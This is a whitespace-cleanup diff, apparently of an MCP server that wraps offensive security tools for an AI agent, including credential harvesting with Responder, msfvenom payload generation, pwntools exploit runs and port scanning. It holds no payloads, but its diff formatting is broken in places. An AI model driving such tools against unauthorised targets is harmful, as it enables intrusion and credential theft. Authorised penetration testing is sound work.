     def subfinder_scan(domain: str, silent: bool = True, all_sources: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Subfinder for passive subdomain enumeration with enhanced logging.
-        
+
         Args:
             domain: The target domain
             silent: Run in silent mode
             all_sources: Use all sources
             additional_args: Additional Subfinder arguments
-        
+
         Returns:
             Passive subdomain enumeration results
         """
@@ -1374,14 +1374,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def smbmap_scan(target: str, username: str = "", password: str = "", domain: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute SMBMap for SMB share enumeration with enhanced logging.
-        
+
         Args:
             target: The target IP address
             username: Username for authentication
             password: Password for authentication
             domain: Domain for authentication
             additional_args: Additional SMBMap arguments
-        
+
         Returns:
             SMB share enumeration results
         """
@@ -1405,12 +1405,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
 
     @mcp.tool()
-    def rustscan_fast_scan(target: str, ports: str = "", ulimit: int = 5000, 
-                          batch_size: int = 4500, timeout: int = 1500, 
+    def rustscan_fast_scan(target: str, ports: str = "", ulimit: int = 5000,
                          batch_size: int = 4500, timeout: int = 1500,
                           scripts: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Rustscan for ultra-fast port scanning with enhanced logging.
-        
+
         Args:
             target: The target IP address or hostname
             ports: Specific ports to scan (e.g., "22,80,443")
@@ -1419,7 +1419,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             timeout: Timeout in milliseconds
             scripts: Run Nmap scripts on discovered ports
             additional_args: Additional Rustscan arguments
-        
+
         Returns:
             Ultra-fast port scanning results
         """
@@ -1441,12 +1441,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def masscan_high_speed(target: str, ports: str = "1-65535", rate: int = 1000, 
-                          interface: str = "", router_mac: str = "", source_ip: str = "", 
+    def masscan_high_speed(target: str, ports: str = "1-65535", rate: int = 1000,
                          interface: str = "", router_mac: str = "", source_ip: str = "",
                           banners: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Masscan for high-speed Internet-scale port scanning with intelligent rate limiting.
-        
+
         Args:
             target: The target IP address or CIDR range
             ports: Port range to scan
@@ -1456,7 +1456,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             source_ip: Source IP address
             banners: Enable banner grabbing
             additional_args: Additional Masscan arguments
-        
+
         Returns:
             High-speed port scanning results with intelligent rate limiting
         """
@@ -1479,13 +1479,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def nmap_advanced_scan(target: str, scan_type: str = "-sS", ports: str = "", 
-                          timing: str = "T4", nse_scripts: str = "", os_detection: bool = False, 
-                          version_detection: bool = False, aggressive: bool = False, 
+    def nmap_advanced_scan(target: str, scan_type: str = "-sS", ports: str = "",
                          timing: str = "T4", nse_scripts: str = "", os_detection: bool = False,
                          version_detection: bool = False, aggressive: bool = False,
                           stealth: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute advanced Nmap scans with custom NSE scripts and optimized timing.
-        
+
         Args:
             target: The target IP address or hostname
             scan_type: Nmap scan type (e.g., -sS, -sT, -sU)
@@ -1497,7 +1497,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             aggressive: Enable aggressive scanning
             stealth: Enable stealth mode
             additional_args: Additional Nmap arguments
-        
+
         Returns:
             Advanced Nmap scanning results with custom NSE scripts
         """
@@ -1522,13 +1522,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def autorecon_comprehensive(target: str, output_dir: str = "/tmp/autorecon", 
-                               port_scans: str = "top-100-ports", service_scans: str = "default", 
-                               heartbeat: int = 60, timeout: int = 300, 
+    def autorecon_comprehensive(target: str, output_dir: str = "/tmp/autorecon",
                               port_scans: str = "top-100-ports", service_scans: str = "default",
                               heartbeat: int = 60, timeout: int = 300,
                                additional_args: str = "") -> Dict[str, Any]:
         """
         Execute AutoRecon for comprehensive automated reconnaissance.
-        
+
         Args:
             target: The target IP address or hostname
             output_dir: Output directory for results
@@ -1537,7 +1537,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             heartbeat: Heartbeat interval in seconds
             timeout: Timeout for individual scans
             additional_args: Additional AutoRecon arguments
-        
+
         Returns:
             Comprehensive automated reconnaissance results
         """
@@ -1559,13 +1559,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def enum4linux_ng_advanced(target: str, username: str = "", password: str = "", 
-                              domain: str = "", shares: bool = True, users: bool = True, 
-                              groups: bool = True, policy: bool = True, 
+    def enum4linux_ng_advanced(target: str, username: str = "", password: str = "",
                              domain: str = "", shares: bool = True, users: bool = True,
                              groups: bool = True, policy: bool = True,
                               additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Enum4linux-ng for advanced SMB enumeration with enhanced logging.
-        
+
         Args:
             target: The target IP address
             username: Username for authentication
@@ -1576,7 +1576,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             groups: Enumerate groups
             policy: Enumerate policies
             additional_args: Additional Enum4linux-ng arguments
-        
+
         Returns:
             Advanced SMB enumeration results
         """
@@ -1600,12 +1600,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def rpcclient_enumeration(target: str, username: str = "", password: str = "", 
-                             domain: str = "", commands: str = "enumdomusers;enumdomgroups;querydominfo", 
+    def rpcclient_enumeration(target: str, username: str = "", password: str = "",
                             domain: str = "", commands: str = "enumdomusers;enumdomgroups;querydominfo",
                              additional_args: str = "") -> Dict[str, Any]:
         """
         Execute rpcclient for RPC enumeration with enhanced logging.
-        
+
         Args:
             target: The target IP address
             username: Username for authentication
@@ -1613,7 +1613,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             domain: Domain for authentication
             commands: Semicolon-separated RPC commands
             additional_args: Additional rpcclient arguments
-        
+
         Returns:
             RPC enumeration results
         """
@@ -1634,17 +1634,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def nbtscan_netbios(target: str, verbose: bool = False, timeout: int = 2, 
+    def nbtscan_netbios(target: str, verbose: bool = False, timeout: int = 2,
                        additional_args: str = "") -> Dict[str, Any]:
         """
         Execute nbtscan for NetBIOS name scanning with enhanced logging.
-        
+
         Args:
             target: The target IP address or range
             verbose: Enable verbose output
             timeout: Timeout in seconds
             additional_args: Additional nbtscan arguments
-        
+
         Returns:
             NetBIOS name scanning results
         """
@@ -1663,11 +1663,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def arp_scan_discovery(target: str = "", interface: str = "", local_network: bool = False, 
+    def arp_scan_discovery(target: str = "", interface: str = "", local_network: bool = False,
                           timeout: int = 500, retry: int = 3, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute arp-scan for network discovery with enhanced logging.
-        
+
         Args:
             target: The target IP range (if not using local_network)
             interface: Network interface to use
@@ -1675,7 +1675,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             timeout: Timeout in milliseconds
             retry: Number of retries
             additional_args: Additional arp-scan arguments
-        
+
         Returns:
             Network discovery results via ARP scanning
         """
@@ -1696,13 +1696,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def responder_credential_harvest(interface: str = "eth0", analyze: bool = False, 
-                                    wpad: bool = True, force_wpad_auth: bool = False, 
-                                    fingerprint: bool = False, duration: int = 300, 
+    def responder_credential_harvest(interface: str = "eth0", analyze: bool = False,
                                    wpad: bool = True, force_wpad_auth: bool = False,
                                    fingerprint: bool = False, duration: int = 300,
                                     additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Responder for credential harvesting with enhanced logging.
-        
+
         Args:
             interface: Network interface to use
             analyze: Analyze mode only
@@ -1711,7 +1711,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             fingerprint: Fingerprint mode
             duration: Duration to run in seconds
             additional_args: Additional Responder arguments
-        
+
         Returns:
             Credential harvesting results
         """
@@ -1736,13 +1736,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def volatility_analyze(memory_file: str, plugin: str, profile: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Volatility for memory forensics analysis with enhanced logging.
-        
+
         Args:
             memory_file: Path to memory dump file
             plugin: Volatility plugin to use
             profile: Memory profile to use
             additional_args: Additional Volatility arguments
-        
+
         Returns:
             Memory forensics analysis results
         """
@@ -1764,7 +1764,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def msfvenom_generate(payload: str, format_type: str = "", output_file: str = "", encoder: str = "", iterations: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute MSFVenom for payload generation with enhanced logging.
-        
+
         Args:
             payload: The payload to generate
             format_type: Output format (exe, elf, raw, etc.)
@@ -1772,7 +1772,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             encoder: Encoder to use
             iterations: Number of encoding iterations
             additional_args: Additional MSFVenom arguments
-        
+
         Returns:
             Payload generation results
         """
@@ -1800,13 +1800,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def gdb_analyze(binary: str, commands: str = "", script_file: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute GDB for binary analysis and debugging with enhanced logging.
-        
+
         Args:
             binary: Path to the binary file
             commands: GDB commands to execute
             script_file: Path to GDB script file
             additional_args: Additional GDB arguments
-        
+
         Returns:
             Binary analysis results
         """
@@ -1828,12 +1828,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def radare2_analyze(binary: str, commands: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Radare2 for binary analysis and reverse engineering with enhanced logging.
-        
+
         Args:
             binary: Path to the binary file
             commands: Radare2 commands to execute
             additional_args: Additional Radare2 arguments
-        
+
         Returns:
             Binary analysis results
         """
@@ -1854,12 +1854,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def binwalk_analyze(file_path: str, extract: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Binwalk for firmware and file analysis with enhanced logging.
-        
+
         Args:
             file_path: Path to the file to analyze
             extract: Whether to extract discovered files
             additional_args: Additional Binwalk arguments
-        
+
         Returns:
             Firmware analysis results
         """
@@ -1880,12 +1880,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def ropgadget_search(binary: str, gadget_type: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Search for ROP gadgets in a binary using ROPgadget with enhanced logging.
-        
+
         Args:
             binary: Path to the binary file
             gadget_type: Type of gadgets to search for
             additional_args: Additional ROPgadget arguments
-        
+
         Returns:
             ROP gadget search results
         """
@@ -1906,10 +1906,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def checksec_analyze(binary: str) -> Dict[str, Any]:
         """
         Check security features of a binary with enhanced logging.
-        
+
         Args:
             binary: Path to the binary file
-        
+
         Returns:
             Security features analysis results
         """
@@ -1928,13 +1928,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def xxd_hexdump(file_path: str, offset: str = "0", length: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Create a hex dump of a file using xxd with enhanced logging.
-        
+
         Args:
             file_path: Path to the file
             offset: Offset to start reading from
             length: Number of bytes to read
             additional_args: Additional xxd arguments
-        
+
         Returns:
             Hex dump results
         """
@@ -1956,12 +1956,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def strings_extract(file_path: str, min_len: int = 4, additional_args: str = "") -> Dict[str, Any]:
         """
         Extract strings from a binary file with enhanced logging.
-        
+
         Args:
             file_path: Path to the file
             min_len: Minimum string length
             additional_args: Additional strings arguments
-        
+
         Returns:
             String extraction results
         """
@@ -1982,12 +1982,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def objdump_analyze(binary: str, disassemble: bool = True, additional_args: str = "") -> Dict[str, Any]:
         """
         Analyze a binary using objdump with enhanced logging.
-        
+
         Args:
             binary: Path to the binary file
             disassemble: Whether to disassemble the binary
             additional_args: Additional objdump arguments
-        
+
         Returns:
             Binary analysis results
         """
@@ -2009,12 +2009,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
 
     @mcp.tool()
-    def ghidra_analysis(binary: str, project_name: str = "hexstrike_analysis", 
-                       script_file: str = "", analysis_timeout: int = 300, 
+    def ghidra_analysis(binary: str, project_name: str = "hexstrike_analysis",
                       script_file: str = "", analysis_timeout: int = 300,
                        output_format: str = "xml", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Ghidra for advanced binary analysis and reverse engineering.
-        
+
         Args:
             binary: Path to the binary file
             project_name: Ghidra project name
@@ -2022,7 +2022,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             analysis_timeout: Analysis timeout in seconds
             output_format: Output format (xml, json)
             additional_args: Additional Ghidra arguments
-        
+
         Returns:
             Advanced binary analysis results from Ghidra
         """
@@ -2043,12 +2043,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def pwntools_exploit(script_content: str = "", target_binary: str = "", 
-                        target_host: str = "", target_port: int = 0, 
+    def pwntools_exploit(script_content: str = "", target_binary: str = "",
                        target_host: str = "", target_port: int = 0,
                         exploit_type: str = "local", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Pwntools for exploit development and automation.
-        
+
         Args:
             script_content: Python script content using pwntools
             target_binary: Local binary to exploit
@@ -2056,7 +2056,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             target_port: Remote port to connect to
             exploit_type: Type of exploit (local, remote, format_string, rop)
             additional_args: Additional arguments
-        
+
         Returns:
             Exploit execution results
         """
@@ -2080,12 +2080,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def one_gadget_search(libc_path: str, level: int = 1, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute one_gadget to find one-shot RCE gadgets in libc.
-        
+
         Args:
             libc_path: Path to libc binary
             level: Constraint level (0, 1, 2)
             additional_args: Additional one_gadget arguments
-        
+
         Returns:
             One-shot RCE gadget search results
         """
@@ -2103,17 +2103,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def libc_database_lookup(action: str = "find", symbols: str = "", 
+    def libc_database_lookup(action: str = "find", symbols: str = "",
                             libc_id: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute libc-database for libc identification and offset lookup.
-        
+
         Args:
             action: Action to perform (find, dump, download)
             symbols: Symbols with offsets for find action (format: "symbol1:offset1 symbol2:offset2")
             libc_id: Libc ID for dump/download actions
             additional_args: Additional arguments
-        
+
         Returns:
             Libc database lookup results
         """
@@ -2132,18 +2132,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def gdb_peda_debug(binary: str = "", commands: str = "", attach_pid: int = 0, 
+    def gdb_peda_debug(binary: str = "", commands: str = "", attach_pid: int = 0,
                       core_file: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute GDB with PEDA for enhanced debugging and exploitation.
-        
+
         Args:
             binary: Binary to debug
             commands: GDB commands to execute
             attach_pid: Process ID to attach to
             core_file: Core dump file to analyze
             additional_args: Additional GDB arguments
-        
+
         Returns:
             Enhanced debugging results with PEDA
         """
@@ -2163,12 +2163,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def angr_symbolic_execution(binary: str, script_content: str = "", 
-                               find_address: str = "", avoid_addresses: str = "", 
+    def angr_symbolic_execution(binary: str, script_content: str = "",
                               find_address: str = "", avoid_addresses: str = "",
                                analysis_type: str = "symbolic", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute angr for symbolic execution and binary analysis.
-        
+
         Args:
             binary: Binary to analyze
             script_content: Custom angr script content
@@ -2176,7 +2176,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             avoid_addresses: Comma-separated addresses to avoid
             analysis_type: Type of analysis (symbolic, cfg, static)
             additional_args: Additional arguments
-        
+
         Returns:
             Symbolic execution and binary analysis results
         """
@@ -2197,12 +2197,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def ropper_gadget_search(binary: str, gadget_type: str = "rop", quality: int = 1, 
-                            arch: str = "", search_string: str = "", 
+    def ropper_gadget_search(binary: str, gadget_type: str = "rop", quality: int = 1,
                            arch: str = "", search_string: str = "",
                             additional_args: str = "") -> Dict[str, Any]:
         """
         Execute ropper for advanced ROP/JOP gadget searching.
-        
+
         Args:
             binary: Binary to search for gadgets
             gadget_type: Type of gadgets (rop, jop, sys, all)
@@ -2210,7 +2210,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             arch: Target architecture (x86, x86_64, arm, etc.)
             search_string: Specific gadget pattern to search for
             additional_args: Additional ropper arguments
-        
+
         Returns:
             Advanced ROP/JOP gadget search results
         """
@@ -2231,18 +2231,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def pwninit_setup(binary: str, libc: str = "", ld: str = "", 
+    def pwninit_setup(binary: str, libc: str = "", ld: str = "",
                      template_type: str = "python", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute pwninit for CTF binary exploitation setup.
-        
+
         Args:
             binary: Binary file to set up
             libc: Libc file to use
             ld: Loader file to use
             template_type: Template type (python, c)
             additional_args: Additional pwninit arguments
-        
+
         Returns:
             CTF binary exploitation setup results
         """
@@ -2265,13 +2265,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def feroxbuster_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", threads: int = 10, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Feroxbuster for recursive content discovery with enhanced logging.
-        
+
         Args:
             url: The target URL
             wordlist: Wordlist file to use
             threads: Number of threads
             additional_args: Additional Feroxbuster arguments
-        
+
         Returns:
             Content discovery results
         """
@@ -2293,12 +2293,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def dotdotpwn_scan(target: str, module: str = "http", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute DotDotPwn for directory traversal testing with enhanced logging.
-        
+
         Args:
             target: The target hostname or IP
             module: Module to use (http, ftp, tftp, etc.)
             additional_args: Additional DotDotPwn arguments
-        
+
         Returns:
             Directory traversal test results
         """
@@ -2319,12 +2319,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def xsser_scan(url: str, params: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute XSSer for XSS vulnerability testing with enhanced logging.
-        
+
         Args:
             url: The target URL
             params: Parameters to test
             additional_args: Additional XSSer arguments
-        
+
         Returns:
             XSS vulnerability test results
         """
@@ -2345,12 +2345,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def wfuzz_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Wfuzz for web application fuzzing with enhanced logging.
-        
+
         Args:
             url: The target URL (use FUZZ where you want to inject payloads)
             wordlist: Wordlist file to use
             additional_args: Additional Wfuzz arguments
-        
+
         Returns:
             Web application fuzzing results
         """
@@ -2372,12 +2372,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
 
     @mcp.tool()
-    def dirsearch_scan(url: str, extensions: str = "php,html,js,txt,xml,json", 
-                      wordlist: str = "/usr/share/wordlists/dirsearch/common.txt", 
+    def dirsearch_scan(url: str, extensions: str = "php,html,js,txt,xml,json",
                      wordlist: str = "/usr/share/wordlists/dirsearch/common.txt",
                       threads: int = 30, recursive: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Dirsearch for advanced directory and file discovery with enhanced logging.
-        
+
         Args:
             url: The target URL
             extensions: File extensions to search for
@@ -2385,7 +2385,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             threads: Number of threads to use
             recursive: Enable recursive scanning
             additional_args: Additional Dirsearch arguments
-        
+
         Returns:
             Advanced directory discovery results
         """
@@ -2406,12 +2406,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def katana_crawl(url: str, depth: int = 3, js_crawl: bool = True, 
-                    form_extraction: bool = True, output_format: str = "json", 
+    def katana_crawl(url: str, depth: int = 3, js_crawl: bool = True,
                    form_extraction: bool = True, output_format: str = "json",
                     additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Katana for next-generation crawling and spidering with enhanced logging.
-        
+
         Args:
             url: The target URL to crawl
             depth: Crawling depth
@@ -2419,7 +2419,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             form_extraction: Enable form extraction
             output_format: Output format (json, txt)
             additional_args: Additional Katana arguments
-        
+
         Returns:
             Advanced web crawling results with endpoints and forms
         """
@@ -2440,19 +2440,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def gau_discovery(domain: str, providers: str = "wayback,commoncrawl,otx,urlscan", 
-                     include_subs: bool = True, blacklist: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", 
+    def gau_discovery(domain: str, providers: str = "wayback,commoncrawl,otx,urlscan",
                    include_subs: bool = True, blacklist: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico",
                      additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Gau (Get All URLs) for URL discovery from multiple sources with enhanced logging.
-        
+
         Args:
             domain: The target domain
             providers: Data providers to use
             include_subs: Include subdomains
             blacklist: File extensions to blacklist
             additional_args: Additional Gau arguments
-        
+
         Returns:
             Comprehensive URL discovery results from multiple sources
         """
@@ -2472,17 +2472,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def waybackurls_discovery(domain: str, get_versions: bool = False, 
+    def waybackurls_discovery(domain: str, get_versions: bool = False,
                              no_subs: bool = False, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Waybackurls for historical URL discovery with enhanced logging.
-        
+
         Args:
             domain: The target domain
             get_versions: Get all versions of URLs
             no_subs: Don't include subdomains
             additional_args: Additional Waybackurls arguments
-        
+
         Returns:
             Historical URL discovery results from Wayback Machine
         """
@@ -2501,12 +2501,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def arjun_parameter_discovery(url: str, method: str = "GET", wordlist: str = "", 
-                                 delay: int = 0, threads: int = 25, stable: bool = False, 
+    def arjun_parameter_discovery(url: str, method: str = "GET", wordlist: str = "",
                                 delay: int = 0, threads: int = 25, stable: bool = False,
                                  additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Arjun for HTTP parameter discovery with enhanced logging.
-        
+
         Args:
             url: The target URL
             method: HTTP method to use
@@ -2515,7 +2515,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             threads: Number of threads
             stable: Use stable mode
             additional_args: Additional Arjun arguments
-        
+
         Returns:
             HTTP parameter discovery results
         """
@@ -2537,19 +2537,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def paramspider_mining(domain: str, level: int = 2, 
-                          exclude: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", 
+    def paramspider_mining(domain: str, level: int = 2,
                         exclude: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico",
                           output: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute ParamSpider for parameter mining from web archives with enhanced logging.
-        
+
         Args:
             domain: The target domain
             level: Mining level depth
             exclude: File extensions to exclude
             output: Output file path
             additional_args: Additional ParamSpider arguments
-        
+
         Returns:
             Parameter mining results from web archives
         """
@@ -2569,12 +2569,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def x8_parameter_discovery(url: str, wordlist: str = "/usr/share/wordlists/x8/params.txt", 
-                              method: str = "GET", body: str = "", headers: str = "", 
+    def x8_parameter_discovery(url: str, wordlist: str = "/usr/share/wordlists/x8/params.txt",
                             method: str = "GET", body: str = "", headers: str = "",
                               additional_args: str = "") -> Dict[str, Any]:
         """
         Execute x8 for hidden parameter discovery with enhanced logging.
-        
+
         Args:
             url: The target URL
             wordlist: Parameter wordlist
@@ -2582,7 +2582,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             body: Request body
             headers: Custom headers
             additional_args: Additional x8 arguments
-        
+
         Returns:
             Hidden parameter discovery results
         """
@@ -2603,12 +2603,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def jaeles_vulnerability_scan(url: str, signatures: str = "", config: str = "", 
-                                 threads: int = 20, timeout: int = 20, 
+    def jaeles_vulnerability_scan(url: str, signatures: str = "", config: str = "",
                                threads: int = 20, timeout: int = 20,
                                  additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Jaeles for advanced vulnerability scanning with custom signatures.
- + Args: url: The target URL signatures: Custom signature path @@ -2616,7 +2616,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: threads: Number of threads timeout: Request timeout additional_args: Additional Jaeles arguments - + Returns: Advanced vulnerability scanning results with custom signatures """ @@ -2637,12 +2637,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def dalfox_xss_scan(url: str, pipe_mode: bool = False, blind: bool = False, - mining_dom: bool = True, mining_dict: bool = True, + def dalfox_xss_scan(url: str, pipe_mode: bool = False, blind: bool = False, + mining_dom: bool = True, mining_dict: bool = True, custom_payload: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Dalfox for advanced XSS vulnerability scanning with enhanced logging. - + Args: url: The target URL pipe_mode: Use pipe mode for input @@ -2651,7 +2651,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: mining_dict: Enable dictionary mining custom_payload: Custom XSS payload additional_args: Additional Dalfox arguments - + Returns: Advanced XSS vulnerability scanning results """ @@ -2673,13 +2673,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def httpx_probe(target: str, probe: bool = True, tech_detect: bool = False, - status_code: bool = False, content_length: bool = False, - title: bool = False, web_server: bool = False, threads: int = 50, + def httpx_probe(target: str, probe: bool = True, tech_detect: bool = False, + status_code: bool = False, content_length: bool = False, + title: bool = False, web_server: bool = False, threads: int = 50, additional_args: str = "") -> Dict[str, Any]: """ Execute httpx for fast HTTP probing and technology detection. - + Args: target: Target file or single URL probe: Enable probing @@ -2690,7 +2690,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: web_server: Show web server threads: Number of threads additional_args: Additional httpx arguments - + Returns: Fast HTTP probing results with technology detection """ @@ -2714,16 +2714,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def anew_data_processing(input_data: str, output_file: str = "", + def anew_data_processing(input_data: str, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute anew for appending new lines to files (useful for data processing). - + Args: input_data: Input data to process output_file: Output file path additional_args: Additional anew arguments - + Returns: Data processing results with unique line filtering """ @@ -2741,16 +2741,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def qsreplace_parameter_replacement(urls: str, replacement: str = "FUZZ", + def qsreplace_parameter_replacement(urls: str, replacement: str = "FUZZ", additional_args: str = "") -> Dict[str, Any]: """ Execute qsreplace for query string parameter replacement. 
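        Example (placeholder URL; each query value is rewritten to the replacement string):
            qsreplace_parameter_replacement("https://example.com/search?q=a&page=2", "FUZZ")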
